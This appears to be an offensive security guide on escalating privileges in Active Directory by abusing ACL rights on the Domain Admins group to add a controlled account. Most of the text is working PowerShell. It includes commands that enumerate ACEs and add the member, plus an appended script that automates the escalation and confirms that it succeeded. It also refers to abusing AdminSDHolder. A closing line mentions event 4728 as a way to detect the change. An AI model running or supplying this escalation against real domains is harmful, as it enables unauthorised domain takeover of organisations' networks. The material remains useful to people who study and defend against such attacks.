
Add Members to Domain Admin


Use permissions on Domain Admins to add users to the group.


This action requires having rights over the Domain Admins group (for example GenericAll, GenericWrite, WriteDacl, WriteOwner, or WriteProperty on the member attribute). These rights can be obtained by following my guide on modifying the AdminSDHolder container, which pushes an ACE down to every protected group, or they can be granted manually on the group itself.


List every principal that holds an ACE on the Domain Admins group. The AD: drive is provided by the ActiveDirectory module, so import it first.

Import-Module ActiveDirectory
(Get-Acl -Path "AD:\<DN of the Domain Admins group>").Access | select IdentityReference -Unique

If an interesting principal, for example one that we control, is found, inspect its rights over the group (ActiveDirectoryRights and, for WriteProperty, the ObjectType GUID that tells which attribute it applies to).

(Get-Acl -Path "AD:\<DN of the Domain Admins group>").Access | ?{$_.IdentityReference -match '<IdentityReference>'}

Add a user to the Domain Admins group. The group is identified by its own SamAccountName ("Domain Admins"), the new member by theirs.

Add-ADGroupMember -Identity 'Domain Admins' -Members <SamAccountName>
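The three steps above combined into one script, as an added example that is not part of the original post. It resolves the group, keeps only the ACEs that are actually enough to add a member, checks whether the account we control appears among them, performs the addition and confirms it. The account name $ControlledUser and the assumption that the ActiveDirectory (RSAT) module is available in a session joined to the target domain are mine, not the post's.

```powershell
# Added example (not from the original post): find who can modify Domain Admins,
# then add a controlled account and verify. Assumes the ActiveDirectory module
# is installed and the session runs as a domain principal.
Import-Module ActiveDirectory

# Assumed: the account we control. Replace with the real SamAccountName.
$ControlledUser = 'jdoe'

# 'Domain Admins' is the group's SamAccountName in every domain; its DN comes
# back from the directory, so no hard-coded DN is needed.
$DA = Get-ADGroup -Identity 'Domain Admins'
$AclPath = "AD:\$($DA.DistinguishedName)"

# Schema GUID of the 'member' attribute. A WriteProperty ACE scoped to it is
# sufficient to add members even without GenericAll on the group.
$MemberAttrGuid = [Guid]'bf9679c0-0de6-11d0-a285-00aa003049e2'

# Rights that on their own permit adding a member, or permit rewriting the
# DACL / taking ownership and then granting that right to oneself.
$InterestingRights = 'GenericAll|GenericWrite|WriteDacl|WriteOwner'

$Acl = Get-Acl -Path $AclPath
$Capable = $Acl.Access | Where-Object {
    $_.AccessControlType -eq 'Allow' -and (
        $_.ActiveDirectoryRights -match $InterestingRights -or
        ($_.ActiveDirectoryRights -match 'WriteProperty' -and
         ($_.ObjectType -eq $MemberAttrGuid -or $_.ObjectType -eq [Guid]::Empty))
    )
} | Select-Object IdentityReference, ActiveDirectoryRights, ObjectType

"Principals that can add members to $($DA.DistinguishedName):"
$Capable | Format-Table -AutoSize

# Only direct ACEs are matched here. Rights inherited through group membership
# are not expanded; compare against 'whoami /groups' or
# Get-ADPrincipalGroupMembership if the controlled account is not listed directly.
$Domain = (Get-ADDomain).NetBIOSName
$Mine = $Capable | Where-Object { $_.IdentityReference -eq "$Domain\$ControlledUser" }
if (-not $Mine) {
    Write-Warning "$Domain\$ControlledUser holds no direct ACE on Domain Admins; check group-inherited rights before continuing."
}

# Perform the addition and confirm it landed.
Add-ADGroupMember -Identity $DA -Members $ControlledUser
$Members = Get-ADGroupMember -Identity $DA | Select-Object -ExpandProperty SamAccountName
if ($Members -contains $ControlledUser) {
    "$ControlledUser is now a member of Domain Admins"
} else {
    Write-Error "Addition failed; the token used probably lacks the required right."
}
```

Run it as the controlled account (or with its credentials supplied to the AD cmdlets via -Credential) so that the final Add-ADGroupMember is performed with the token whose rights you just enumerated; otherwise the verification step tells you nothing about that account's effective permissions.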

Now the user is a member of the Domain Admins group and can perform almost every action on almost every object in Active Directory. Of course, this technique is easily detectable: the new account shows up in the group's member list, and the domain controller logs the change as event 4728 (a member was added to a security-enabled global group), which most monitoring rules alert on for Domain Admins.